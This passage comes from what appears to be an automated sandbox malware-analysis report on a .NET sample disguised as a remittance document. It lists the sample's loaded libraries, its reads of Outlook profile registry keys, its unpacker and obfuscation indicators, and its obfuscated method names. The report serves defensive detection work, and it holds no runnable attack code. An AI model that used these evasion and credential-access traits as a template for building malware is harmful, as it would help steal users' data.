            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: winver.pdb source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494386152.00000000009F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259718718.0000000000F0E000.00000002.00000001.01000000.0000000E.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4493691348.0000000000F0E000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: wntdll.pdbUGP source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2334615268.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.000000000504E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2332306459.0000000004B46000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2334615268.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.000000000504E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2332306459.0000000004B46000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: winver.pdbGCTL source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494386152.00000000009F8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
            Source: GRogNEHvcL.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: GRogNEHvcL.exe.0.dr, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.cs.Net Code: J9VHEH5Tcb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, pEl1BokNiGulhgUCNc.cs.Net Code: J9VHEH5Tcb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6ab0000.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, pEl1BokNiGulhgUCNc.cs.Net Code: J9VHEH5Tcb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.2854940.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_00E3F110 pushad ; iretd 0_2_00E3F111
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0041E803 push edi; retf 9_2_0041E80F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_004238D3 push esp; ret 9_2_004238E2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0041C8AD push ss; retf 9_2_0041C8AE
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0040CCE3 push FFFFFFB0h; iretd 9_2_0040CCEB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_00423F33 push 00000030h; retf 9_2_00423FB4
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_00407FD2 push edi; retf 9_2_00407FD3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_00402FF0 push eax; ret 9_2_00402FF2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0176225F pushad ; ret 9_2_017627F9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017627FA pushad ; ret 9_2_017627F9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017909AD push ecx; mov dword ptr [esp], ecx9_2_017909B6
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0176283D push eax; iretd 9_2_01762858
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_0119F110 pushad ; iretd 10_2_0119F111
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_0119F113 push esp; iretd 10_2_0119F119
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A7C54D pushfd ; ret 14_2_01A7C54E
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A309AD push ecx; mov dword ptr [esp], ecx14_2_01A309B6
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A7C9D7 push edi; ret 14_2_01A7C9D9
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A01366 push eax; iretd 14_2_01A01369
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A01FEC push eax; iretd 14_2_01A01FED
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A87E99 push ecx; ret 14_2_01A87EAC
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: section name: .text entropy: 7.971455070226271
            Source: GRogNEHvcL.exe.0.drStatic PE information: section name: .text entropy: 7.971455070226271
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, vgVMeh5ONaAkPMui60.csHigh entropy of concatenated method names: 'CiYOmFhZPy', 'hfjOt71JUw', 'lrfpxrLEd6', 'Nyppbgggcm', 'f82p2ygIlJ', 'zUVpG3P57B', 'RNnpL1ecPj', 'Kgbp3KkdyX', 'y2UpTk1cYB', 'oCPpYyQBem'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, S19G3ec6CaHZBvv4Er.csHigh entropy of concatenated method names: 'HP0J5MSKAa', 'iZBJPJKnCT', 'ToString', 'omWJgPZKmf', 'qb7JaT5QXc', 'UjQJptWTuL', 'iExJOo5GDX', 'CYvJjn0Rjl', 'Io8JX5iiuf', 'HLUJwoEfQV'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, BubSUn4g8lttOexA3X.csHigh entropy of concatenated method names: 'mJKr0w3Qx5', 'gKPrieX2wS', 'pW6rQJPqTe', 'owqrZuqjpB', 'v8trbpneg0', 'drUr2GKMYJ', 'muQrLb0yEd', 'g2xr3OWVxG', 'pTUrYhYHyZ', 'tnUrFrxD3B'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, vf1bhSdHHYJ8A9DRaw.csHigh entropy of concatenated method names: 'hr6XB658pa', 'FJTXRdkH8p', 'WXmXEpw358', 'CHZX6t58h3', 'm4jXmSHboT', 'SjoXDauvQC', 'ooYXtrLMaJ', 'Rw9X0Ys6h1', 'EGiXiWkUst', 'O1XXnFZlfe'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, Yuj46yNx4rpAlmUpiQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'g04oM621eY', 'kqIoVyEBID', 's8pozHY3eo', 'FrkUcQ1ovf', 'kjnU4TfZtu', 'VVMUorpr9a', 'QJwUUeTPp6', 'utHicIGe2BKMn5lc8wX'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, U6C8XXUv0ve2kcHMmO.csHigh entropy of concatenated method names: 'Sy0jNRmqgh', 'cjmjaaI1jR', 'aTJjOK8TGa', 'qpOjXCGLjM', 'pIejwuebhY', 'eP8OWLlphc', 'fH9Osv4rYI', 'yWpOldfvMe', 'eTGOyOaZsx', 'BNJOMyJoZ7'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, mQ0VywCHpDCHBFas9G.csHigh entropy of concatenated method names: 'taaeQB1t9n', 'rOveZxtDVs', 'iBqexIso1f', 'uW1eboJbGL', 'ABQe8Wb4JL', 'WKse2jIYk4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, dn8oJO8aicYPFuG3q7.csHigh entropy of concatenated method names: 'Sk5E7neIX', 'f5O6sZTnw', 'RwcDtjhnM', 'yNNtH2BGU', 'xiJicV9HV', 'x6DnX28FQ', 'kEMqgeJNTRYVvUlyfv', 'fnLSrl7AMgVNQj5FsB', 'svieKKdYP', 'KUkCI5KgH'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, vjrmrlWAG0dDAaMj2h.csHigh entropy of concatenated method names: 'Tva4XGCVq4', 'zsk4wX6IMD', 'BXJ45ZSyu7', 'lfA4PVd6N7', 'PWK4ASlOAH', 'CmL49NXIiM', 'D3aV20xIGENewBviV4', 'Wo6qCOYCmCdPoyO5DW', 'r9u44QDUXA', 'NUy4UDVEZW'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, i8egbkjFJP5F3RxotWg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sCyC8elkiF', 'U2UC1slHBX', 'xaACq6u8lH', 'QVPCdxoiXp', 'OtPCW3hSIS', 'IpLCsXcl6Q', 'snmCl0VEXf'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, zAgZHnjqnqblC13b4yB.csHigh entropy of concatenated method names: 'kcC7BswgDc', 'qeL7RfN8Ad', 'wR27ExLBk7', 'FK6762VMaC', 'CHS7mZq97P', 'N2D7DFUDT3', 'oxT7tp2a5Q', 'voD70fmrOd', 'JkT7iX9lHO', 'CE57nulydM'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, t2aK0SX3teb8FBFlWg.csHigh entropy of concatenated method names: 'e1fAYqLvvP', 'yYrAfyQLxo', 'dCoA81Ock3', 'aKUA18X0CQ', 'nyqAZNiEfq', 'P1jAxsm4Fq', 'z4eAbsO44W', 'kxoA2VhkZw', 'MI7AGoQuvx', 'dAsALtuhxO'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, eQDLlF0mF1BvPPtfCH.csHigh entropy of concatenated method names: 'kmla84c746', 'QR1a1hg6uX', 'ppCaqUTmLL', 'lnTadtaIP1', 'VpNaWe2qrr', 'v02ass96CK', 'f9PallIfPA', 'XKDayn3J4c', 'JXvaMuOAxK', 'YC3aVMM6lQ'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, py6OwdfHhY9vOuqCQL.csHigh entropy of concatenated method names: 'zTK74H0Igw', 'RJ27UhXr6O', 'H047H12k6M', 'VYB7g8Cack', 'xub7aDP7sl', 'asf7OToeLU', 'SbA7jIQjaB', 'LXdelkcZX8', 'znPeynlVua', 'SjeeMyi4pv'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, puU2W8ZrfZp4OhD3Tm.csHigh entropy of concatenated method names: 'glnegZiU9F', 'lIreaHqBFt', 'DapepisYH2', 'QKeeOVGvEb', 'RErejAp8ow', 'TVreXUM6R9', 'ph1ewDAuRw', 'gnFehjVXuZ', 'VZYe5ZdIEa', 'R38ePJMuMC'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.csHigh entropy of concatenated method names: 'wvmUNG8C41', 'zOrUgkpbcZ', 'XneUafup1B', 'M5kUprhwVN', 'JBXUOyl878', 'EUUUj2yB8r', 'Mm3UXigEYX', 'f5MUwMCl5u', 'hl9UheluYP', 'zxwU5wigv8'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, MqXGgssMO1Fekyy8Ue.csHigh entropy of concatenated method names: 'TSoJyTLen1', 'lgbJVeDXFN', 'r1iecATgq5', 'qOie4XXRlF', 'wZVJF0IPsr', 'sdGJfWtTNs', 'p23JuH8SZF', 'OjJJ8XCibU', 'lMLJ1eetI5', 'h1EJq8RMN9'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, E3nYVuzF8BiBFLgvyG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LQT7r2dnq3', 'MjR7A2xZBg', 'Qye79xagac', 'FJq7Jdbx1W', 'YDH7e0xVPV', 'W5177skZLG', 'l3A7CWSwgT'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, IPTiVEoD9SEW2ijISU.csHigh entropy of concatenated method names: 'Dispose', 'ChZ4MxIRQj', 'HRHoZc5HZc', 'hN5SSi3RkW', 'fLC4VIxQXO', 'RW24zN5igM', 'ProcessDialogKey', 'PMfocoCnSX', 'Nn6o44coWa', 'C2xooLoImE'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, d87gQCndHkNhNRfkD8.csHigh entropy of concatenated method names: 'Uo9p6EZbMd', 'vEBpDiZjQt', 'kYNp0camaQ', 'IH3piCD1us', 'vHRpAmfeNI', 'KGfp9YKpmn', 'jZWpJydEOw', 'dfTpe5DyIE', 'yUYp7Kv9n4', 'l9IpCAK4Qo'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, ITbjRnelAIyF0LCEDn.csHigh entropy of concatenated method names: 'ToString', 'Swo9Fyalwy', 'cQe9ZBrC6T', 'Eyq9xSLpBO', 'ONw9bnfjfb', 'JM392r75J4', 'p1x9GMYM0q', 'cXb9LvfVZM', 'tUc93PMfTK', 'pv09TuZCNC'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, qXhj9uT83Th3DKXxfu.csHigh entropy of concatenated method names: 'tUWXgYJ8XR', 'T7IXpbMfvQ', 'f2iXjU1sG2', 'EHfjV1B8DC', 'jLWjztE4WA', 'spVXcnndem', 'lLwX4aRuAr', 'YR4Xo27Pyq', 'vJZXUFrrd8', 'fx4XHvcPX6'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, vgVMeh5ONaAkPMui60.csHigh entropy of concatenated method names: 'CiYOmFhZPy', 'hfjOt71JUw', 'lrfpxrLEd6', 'Nyppbgggcm', 'f82p2ygIlJ', 'zUVpG3P57B', 'RNnpL1ecPj', 'Kgbp3KkdyX', 'y2UpTk1cYB', 'oCPpYyQBem'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, S19G3ec6CaHZBvv4Er.csHigh entropy of concatenated method names: 'HP0J5MSKAa', 'iZBJPJKnCT', 'ToString', 'omWJgPZKmf', 'qb7JaT5QXc', 'UjQJptWTuL', 'iExJOo5GDX', 'CYvJjn0Rjl', 'Io8JX5iiuf', 'HLUJwoEfQV'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, BubSUn4g8lttOexA3X.csHigh entropy of concatenated method names: 'mJKr0w3Qx5', 'gKPrieX2wS', 'pW6rQJPqTe', 'owqrZuqjpB', 'v8trbpneg0', 'drUr2GKMYJ', 'muQrLb0yEd', 'g2xr3OWVxG', 'pTUrYhYHyZ', 'tnUrFrxD3B'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, vf1bhSdHHYJ8A9DRaw.csHigh entropy of concatenated method names: 'hr6XB658pa', 'FJTXRdkH8p', 'WXmXEpw358', 'CHZX6t58h3', 'm4jXmSHboT', 'SjoXDauvQC', 'ooYXtrLMaJ', 'Rw9X0Ys6h1', 'EGiXiWkUst', 'O1XXnFZlfe'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, Yuj46yNx4rpAlmUpiQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'g04oM621eY', 'kqIoVyEBID', 's8pozHY3eo', 'FrkUcQ1ovf', 'kjnU4TfZtu', 'VVMUorpr9a', 'QJwUUeTPp6', 'utHicIGe2BKMn5lc8wX'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, U6C8XXUv0ve2kcHMmO.csHigh entropy of concatenated method names: 'Sy0jNRmqgh', 'cjmjaaI1jR', 'aTJjOK8TGa', 'qpOjXCGLjM', 'pIejwuebhY', 'eP8OWLlphc', 'fH9Osv4rYI', 'yWpOldfvMe', 'eTGOyOaZsx', 'BNJOMyJoZ7'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, mQ0VywCHpDCHBFas9G.csHigh entropy of concatenated method names: 'taaeQB1t9n', 'rOveZxtDVs', 'iBqexIso1f', 'uW1eboJbGL', 'ABQe8Wb4JL', 'WKse2jIYk4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, dn8oJO8aicYPFuG3q7.csHigh entropy of concatenated method names: 'Sk5E7neIX', 'f5O6sZTnw', 'RwcDtjhnM', 'yNNtH2BGU', 'xiJicV9HV', 'x6DnX28FQ', 'kEMqgeJNTRYVvUlyfv', 'fnLSrl7AMgVNQj5FsB', 'svieKKdYP', 'KUkCI5KgH'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, vjrmrlWAG0dDAaMj2h.csHigh entropy of concatenated method names: 'Tva4XGCVq4', 'zsk4wX6IMD', 'BXJ45ZSyu7', 'lfA4PVd6N7', 'PWK4ASlOAH', 'CmL49NXIiM', 'D3aV20xIGENewBviV4', 'Wo6qCOYCmCdPoyO5DW', 'r9u44QDUXA', 'NUy4UDVEZW'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, i8egbkjFJP5F3RxotWg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sCyC8elkiF', 'U2UC1slHBX', 'xaACq6u8lH', 'QVPCdxoiXp', 'OtPCW3hSIS', 'IpLCsXcl6Q', 'snmCl0VEXf'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, zAgZHnjqnqblC13b4yB.csHigh entropy of concatenated method names: 'kcC7BswgDc', 'qeL7RfN8Ad', 'wR27ExLBk7', 'FK6762VMaC', 'CHS7mZq97P', 'N2D7DFUDT3', 'oxT7tp2a5Q', 'voD70fmrOd', 'JkT7iX9lHO', 'CE57nulydM'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, t2aK0SX3teb8FBFlWg.csHigh entropy of concatenated method names: 'e1fAYqLvvP', 'yYrAfyQLxo', 'dCoA81Ock3', 'aKUA18X0CQ', 'nyqAZNiEfq', 'P1jAxsm4Fq', 'z4eAbsO44W', 'kxoA2VhkZw', 'MI7AGoQuvx', 'dAsALtuhxO'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, eQDLlF0mF1BvPPtfCH.csHigh entropy of concatenated method names: 'kmla84c746', 'QR1a1hg6uX', 'ppCaqUTmLL', 'lnTadtaIP1', 'VpNaWe2qrr', 'v02ass96CK', 'f9PallIfPA', 'XKDayn3J4c', 'JXvaMuOAxK', 'YC3aVMM6lQ'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, py6OwdfHhY9vOuqCQL.csHigh entropy of concatenated method names: 'zTK74H0Igw', 'RJ27UhXr6O', 'H047H12k6M', 'VYB7g8Cack', 'xub7aDP7sl', 'asf7OToeLU', 'SbA7jIQjaB', 'LXdelkcZX8', 'znPeynlVua', 'SjeeMyi4pv'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, puU2W8ZrfZp4OhD3Tm.csHigh entropy of concatenated method names: 'glnegZiU9F', 'lIreaHqBFt', 'DapepisYH2', 'QKeeOVGvEb', 'RErejAp8ow', 'TVreXUM6R9', 'ph1ewDAuRw', 'gnFehjVXuZ', 'VZYe5ZdIEa', 'R38ePJMuMC'
